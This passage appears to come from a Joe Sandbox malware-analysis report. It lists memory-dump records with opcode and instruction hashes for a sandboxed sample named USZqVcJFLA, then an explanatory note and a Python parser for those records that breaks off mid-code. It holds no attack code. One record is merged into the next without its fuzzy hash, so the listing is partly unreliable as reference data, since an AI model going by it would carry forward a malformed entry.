                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: 7a3ff972c701c47c8497d99d16899b0d405b34eb97d54320f3cf6b1cc0e5afa7
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: B7B01200D9780F44D53433F508670A870005B8C104FC21170D408801B6DC8D12941342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction ID: 39c2542c3cabd34fea6eb3bb0939dcf3f0112d02eee39c16ed8365a89e652324
                                                                                      • Opcode Fuzzy Hash: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction Fuzzy Hash: 6CB01210E080198DE3609B54881037C90A0EF2C300F5110F2C02DE31C3EF281D005600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: ba8ae787f1ac31e28f55b300a88cdd0b4f0074860b82cb489537b29e945e33db
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: efe2b9977143490595ac7a8c60f16f566d14332673ce231a5fb6085849cab868
                                                                                      • Instruction ID: 3340fdb382f59fa8b87d45dd227b4a129be11a30c1a1a2143d02c0f373a3143d
                                                                                      • Opcode Fuzzy Hash: efe2b9977143490595ac7a8c60f16f566d14332673ce231a5fb6085849cab868
                                                                                      • Instruction Fuzzy Hash: EFC1F021B2EA9E0BE32D8B684C520B537D1EBD6306F19867DD4E7C3957E938E90342C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 604464dd4e76fa0d768a562d7a11a06cd01b131a17fcc7e6c69545ad0cfa3dda
                                                                                      • Instruction ID: 7315063db6108dab3a0d4260b1c1554906b21dd9d675af61d8737b8a0d7d1512
                                                                                      • Opcode Fuzzy Hash: 604464dd4e76fa0d768a562d7a11a06cd01b131a17fcc7e6c69545ad0cfa3dda
                                                                                      • Instruction Fuzzy Hash: 4C91F371A19A8D8FE789DB68C8797E97BE0FF59300F4401BAD049C76E6DFB868018741
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K@N_^
                                                                                      • API String ID: 0-813202305
                                                                                      • Opcode ID: 354a05ca828e56bb85f0c2cbc0e6da22ecabd468aaa7b818f8d0c8099fed2b80
                                                                                      • Instruction ID: 53db810b075709bcd93b280a8401856d42732ae6af7227a867898cd0aa324ca0
                                                                                      • Opcode Fuzzy Hash: 354a05ca828e56bb85f0c2cbc0e6da22ecabd468aaa7b818f8d0c8099fed2b80
                                                                                      • Instruction Fuzzy Hash: 8C82C531B1D90E8FEBA8EB5888A16B97392FF9C340F5541B9D01DC369BDD38B9418781
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 0d8ba757c2628b6b91c57c22c6d1c40d243dae4930081c1a03c19baabebcd272
                                                                                      • Instruction ID: 70b7336771b7efa7a87e33e10e594cb8a7aedec92e5f26ff48a88e3d8298e932
                                                                                      • Opcode Fuzzy Hash: 0d8ba757c2628b6b91c57c22c6d1c40d243dae4930081c1a03c19baabebcd272
                                                                                      • Instruction Fuzzy Hash: 4CF0E57160F3C04FCB169B7488688147F60EF2721074A42EFC045CF1A3EA2DC885C701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 7362a34877f85833d27003df65289cd69932fa28452b69de8a55c47c2cb49998
                                                                                      • Instruction ID: cb9095121b5d93adac8b8e7c08ed4e9df460a25d7a6876dfbcfe6e7fd51fcb49
                                                                                      • Opcode Fuzzy Hash: 7362a34877f85833d27003df65289cd69932fa28452b69de8a55c47c2cb49998
                                                                                      • Instruction Fuzzy Hash: 61F0E57164F3C04FCB169A3488688487F61EF2720074A42EFC046CF2E3EA2CC885C701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 09337b69920a4e559365c46de931fa39e7f374dd983a40d206a49cd9ccb7b8da
                                                                                      • Instruction ID: 2145db0d15d1098a4f58589afae54c46533c5ca2d95cc2eef0ba05d6a19b1d48
                                                                                      • Opcode Fuzzy Hash: 09337b69920a4e559365c46de931fa39e7f374dd983a40d206a49cd9ccb7b8da
                                                                                      • Instruction Fuzzy Hash: FEE0127154F7D44FCB169B7488698443F70EE6725074A41DEC155CF1F3E62D994AC701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 466d39b98c4c8725c4ae3a81340d0dd517893926c08a58e50904aec51a1d30b0
                                                                                      • Instruction ID: 8b48e62f7c9ccf1630e314f205331b9a9f82daef2017b5a16f22082f0a6da811
                                                                                      • Opcode Fuzzy Hash: 466d39b98c4c8725c4ae3a81340d0dd517893926c08a58e50904aec51a1d30b0
                                                                                      • Instruction Fuzzy Hash: 02E06D71A0F7C44FC71AEA388869454BFA0EF6720174A42EEC045CF1A7EA2D9889C701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 7a43bbb3a3c26a5bb1f424cba3d4d45f931e1d1a56bb9000aa3f52fa8b08b1ec
                                                                                      • Instruction ID: 4222e7016efe7529e8133d5d8569d1499bb5de00815003ccd730b79e4221560f
                                                                                      • Opcode Fuzzy Hash: 7a43bbb3a3c26a5bb1f424cba3d4d45f931e1d1a56bb9000aa3f52fa8b08b1ec
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction ID: c6de60a4e95c125b0e183863d231682cf2dd9b1df6ddbad731bf655da774b381
                                                                                      • Opcode Fuzzy Hash: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction Fuzzy Hash: 6F01FD34B0A28DCFDB11EBA8C8545ECBBB0EF45314F1442B6C084CB292EA34A7898780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction ID: be1ea1d1036997202cac62bff5981f53b852319f046db152caf4e4a5b01da16e
                                                                                      • Opcode Fuzzy Hash: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction Fuzzy Hash: 7EF08C34E0A28DDEEB11EBA4C5545EDBBB1EF05314F5452A6D045C7292EA74A7848780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fba4cc60ec3d6b399554e5a43547eaeeb2e19877da234da41e747f14235b7646
                                                                                      • Instruction ID: 9b42aea2adc456c2cf113f5a2494c29816821aa382df1ec41371e3da761132c0
                                                                                      • Opcode Fuzzy Hash: fba4cc60ec3d6b399554e5a43547eaeeb2e19877da234da41e747f14235b7646
                                                                                      • Instruction Fuzzy Hash: F1F0B420B1D90F8FE619AB4C84A06A97290FF58301F554274D44ED31A6EE28EA018280
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: baa72a2015793108ae66b0f1d05813b09fb65a07d84ab14ee4a928f9c5622f79
                                                                                      • Instruction ID: bc32d5e3509b036e2a4f1314f926ac3bbdbd2ccf39be54c06c25f683ea2767d1
                                                                                      • Opcode Fuzzy Hash: baa72a2015793108ae66b0f1d05813b09fb65a07d84ab14ee4a928f9c5622f79
                                                                                      • Instruction Fuzzy Hash: 8DE01230719B884FC70E97388869560BBF1EF6621178A53DBD045CB6A3DA29DC89C741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2faa8c5858771b4a3936b82311abfb5922b36cfea6fb058a109991025c3c26b
                                                                                      • Instruction ID: f7f75f22addb178a6cd54755b43b010c8b0954732b401a42ac54a67ea2cca5c8
                                                                                      • Opcode Fuzzy Hash: c2faa8c5858771b4a3936b82311abfb5922b36cfea6fb058a109991025c3c26b
                                                                                      • Instruction Fuzzy Hash: A9D05E30B6090D4B8B0CA62D8858430B3D1EBAA20A7945279940FC2291ED25ECC68B80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ae67add9f424aea47bedf07d37be4581660badc0823aa03a5683da75680f508
                                                                                      • Instruction ID: c96f1f1b887da1d0d4a5c3b70d4f76b8e2f3a9ae6458febd9efae7a8618e7786
                                                                                      • Opcode Fuzzy Hash: 2ae67add9f424aea47bedf07d37be4581660badc0823aa03a5683da75680f508
                                                                                      • Instruction Fuzzy Hash: A3E02231F0C50FCAF721B38088A46E4B305DF24324F0746B5C408D72E6EE5DAA5092C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction ID: a7111a5cf8304330d4f1f898cfd59eab36aa374f85973b720c19934f6be825ba
                                                                                      • Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction Fuzzy Hash: 33E01220F1A11E8FFBB4F794C4657BC62519F98300F9250B4D40EE32E6DD286E419744
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fa9404de9f0a627475721fe103ca6abeb0cd0c4e3797edad446b0ba4712caf7
                                                                                      • Instruction ID: 4d0e718e26f155b59b512dd737a69d011058ec8d67ff5b87e5b08e576cda577f
                                                                                      • Opcode Fuzzy Hash: 5fa9404de9f0a627475721fe103ca6abeb0cd0c4e3797edad446b0ba4712caf7
                                                                                      • Instruction Fuzzy Hash: 0EE0CD71E2850E5FE764DB88DC65A7D67B1FF88704F000135E059C31E5DF3425415741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction ID: e2efb28efd2030582f2b94126146dd60df4dd52828dd202dd99ac55589ebcb75
                                                                                      • Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction Fuzzy Hash: ACC08C00F6B80FC8E53833E914A70ACA2409BCCA10FD31032C00C800B9AC4E23851686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: 731851d84390f0c41736b8267269be39596ad08ca66d1d30114b9de1a637f4cc
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 15C08C30511C0C8FC908EB2AC88580433A0FB4D208BC20090E009C7270D219DCC1C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                      • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                      • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                      • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: 7c33ec76a012ae929e59e9da952bb4dd4332c5a9e21af060aeebf87ee10d9bec
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 63C01280F0E10B8DFBA0239112293BC02404F29361F8A10B9D58D821E39C0C6A011229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: 7a3ff972c701c47c8497d99d16899b0d405b34eb97d54320f3cf6b1cc0e5afa7
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: B7B01200D9780F44D53433F508670A870005B8C104FC21170D408801B6DC8D12941342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction ID: 39c2542c3cabd34fea6eb3bb0939dcf3f0112d02eee39c16ed8365a89e652324
                                                                                      • Opcode Fuzzy Hash: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction Fuzzy Hash: 6CB01210E080198DE3609B54881037C90A0EF2C300F5110F2C02DE31C3EF281D005600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: ba8ae787f1ac31e28f55b300a88cdd0b4f0074860b82cb489537b29e945e33db
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61fa0b07c17ad0fbd3b914ecfeaf961cadb5e85527be08497d0e7968125227a0
                                                                                      • Instruction ID: 16cc08bf8b834655228d7d06a8d604a638d81eac1854fdd8fbf80bc4c2a05b8b
                                                                                      • Opcode Fuzzy Hash: 61fa0b07c17ad0fbd3b914ecfeaf961cadb5e85527be08497d0e7968125227a0
                                                                                      • Instruction Fuzzy Hash: AF31FEA294E7D50FE3038B609C365A57FB09E2321470E05EBD884CF1E3E5186A09D773
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: >N_^$N_^$N_^$N_^
                                                                                      • API String ID: 0-2817434084
                                                                                      • Opcode ID: 25c0d5ff223e8f6e669ccb2661bba58357ffada25fb0f36fe9f3b90bb30d857f
                                                                                      • Instruction ID: 852a644249af80c5e01ffa33e47210b7963048e574ecde5be37bdd7181e764ec
                                                                                      • Opcode Fuzzy Hash: 25c0d5ff223e8f6e669ccb2661bba58357ffada25fb0f36fe9f3b90bb30d857f
                                                                                      • Instruction Fuzzy Hash: 37A15A73B0A5694FD715BB6CECB16F937A1EF41329B0802B7C18CCB193EE6464468781
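The records above are what an analyst pivots on when hunting for related code across reports: the Instruction Fuzzy Hash is the comparable value, the Opcode ID/Opcode Fuzzy Hash pair is identical in every record shown, and the .sdmp and .jbxd names both encode the process (0x37 in the dump name, 55 in the snapshot name) and the region base. The parser below is an added example for this page, not Joe Sandbox code: it reads the report text into structured records and flags inconsistencies such as the empty Instruction Fuzzy Hash that appears in one record above. It only interprets the PID, iteration and base-address fields of the .sdmp name; the four trailing fields are undocumented on the page and are kept as opaque strings, and the `hcaresult_<pid>_<iteration>_<base>_` layout of the snapshot name is inferred from the values on the page. The sample input is constructed from two records copied from the report.

```python
"""Parse 'Memory Dump Source' records from a Joe Sandbox report (plain text) and check them.
Added example, not Joe Sandbox code; only PID, iteration and base address of the .sdmp name are
interpreted, the four trailing fields are undocumented on the page and kept opaque."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample: two records copied from the report text, one with an empty
# Instruction Fuzzy Hash (as occurs on the page), one carrying a String ID.
SAMPLE = """\
Memory Dump Source
• Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
• Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
• Instruction ID: ba8ae787f1ac31e28f55b300a88cdd0b4f0074860b82cb489537b29e945e33db
• Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
• Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
• API ID:
• String ID: >N_^$N_^$N_^$N_^
• API String ID: 0-2817434084
• Opcode ID: 25c0d5ff223e8f6e669ccb2661bba58357ffada25fb0f36fe9f3b90bb30d857f
• Instruction ID: 852a644249af80c5e01ffa33e47210b7963048e574ecde5be37bdd7181e764ec
• Opcode Fuzzy Hash: 25c0d5ff223e8f6e669ccb2661bba58357ffada25fb0f36fe9f3b90bb30d857f
• Instruction Fuzzy Hash: 37A15A73B0A5694FD715BB6CECB16F937A1EF41329B0802B7C18CCB193EE6464468781
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# .sdmp name: <pid hex>.<iteration>.<dump id>.<base address>.<four undocumented fields>.sdmp
SDMP_RE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<iter>\d+)\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
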